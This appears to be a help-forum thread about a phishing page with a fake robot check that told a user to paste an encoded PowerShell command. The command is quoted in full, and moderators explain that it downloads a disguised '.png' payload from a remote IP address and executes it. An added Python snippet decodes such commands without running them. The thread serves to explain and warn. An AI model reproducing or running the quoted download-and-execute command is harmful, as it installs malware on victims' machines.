Malware or Virus?

jswany82

Junior Member
Nov 18, 2025
I received an email at work that looked exactly like a typical email invitation I get. I clicked the link and it took me to a page that looks just like the login page, but it gave me a robot detector. It said I had to verify I was not a robot and told me to paste this into my CMD-R:

powershell -wind mi -Enc aQBlAHgAKAAoACcAegBpAHoAdwB6AHoAcgAgADkANAAuADEANQA5AC4AMQAxADMALgAzADcALwBzAHoAcwB6AGQALgB6AHAAbgB6AGcAfABpAHoAegBlAHoAeAAnACkALgByAGUAcABsAGEAYwBlACgAJwB6ACcALAAnACcAKQApAA==

Obviously I am not going to do it, but what does this command do?
 

Ken g6

Programming Moderator, Elite Member
Moderator
Dec 11, 1999
Interesting. That's a base-64 encoded command. Decode it and it includes a PowerShell command to "replace('z','')" to de-obfuscate another command. It looks like it downloads a ".png file" from a URL, and then executes it. It's pretty clear that's not a PNG image. It's probably more PowerShell scripts, but I'm not going to that URL to find out.
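
What the reply above describes, as an added example that is not part of the original thread: a static decoder that unpacks a `-Enc` argument (base64 of UTF-16LE text) and undoes the `replace()` trick as plain text, without running anything. The sample command is constructed for this example and uses the documentation address 192.0.2.10; the function names are hypothetical.

```python
import base64
import re

# Constructed sample shaped like the command in the thread: a junk letter ('q')
# is scattered through the real command and stripped at run time.
# 192.0.2.10 is a documentation-only address (RFC 5737), not a real indicator.
INNER = "iex(('iqwqr 192.0.2.10/iqmg.pqng|iqeqx').replace('q',''))"
SAMPLE = "powershell -wind mi -Enc " + base64.b64encode(INNER.encode("utf-16-le")).decode()

# Matches -e, -enc, -EncodedCommand and other abbreviations of the switch.
ENC_ARG = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/]{16,}={0,2})", re.I)
# ('literal').replace('x','y') applied to a quoted string literal.
REPLACE = re.compile(r"\(\s*'([^']*)'\s*\)\s*\.replace\(\s*'([^']+)'\s*,\s*'([^']*)'\s*\)", re.I)
INDICATORS = {
    "download": re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b", re.I),
    "execute": re.compile(r"\b(iex|invoke-expression)\b", re.I),
}

def decode_encoded_command(cmdline):
    """Return the script carried in the encoded argument (base64 of UTF-16LE text)."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")

def undo_replace(script):
    """Apply the .replace() to the string literal here, as text, instead of running it."""
    def fold(m):
        return "'" + m.group(1).replace(m.group(2), m.group(3)) + "'"
    return REPLACE.sub(fold, script)

def analyze(cmdline):
    """Decode, de-obfuscate and flag a pasted command line without executing anything."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return None
    clear = undo_replace(script)
    flags = sorted(name for name, rx in INDICATORS.items() if rx.search(clear))
    return {"decoded": script, "deobfuscated": clear, "flags": flags}

if __name__ == "__main__":
    for key, value in analyze(SAMPLE).items():
        print(f"{key}: {value}")
```

The download indicator only matches after the junk letter is removed, which is why the obfuscation is there: a plain keyword scan of the decoded text would see `iex` but not `iwr`.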
 

Steltek

Diamond Member
Mar 29, 2001
It is exactly that.

The IP address of the fake .png file says it is hosted somewhere in the Russian Federation.

@jswany82, in the future don't click on unknown links like that. Just report it, delete it, and move on.

The really good hackers will get you when you click the link and won't need you to self-execute the malware like the script kiddies do.

It truly isn't worth finding out what happens when pigs fly.
 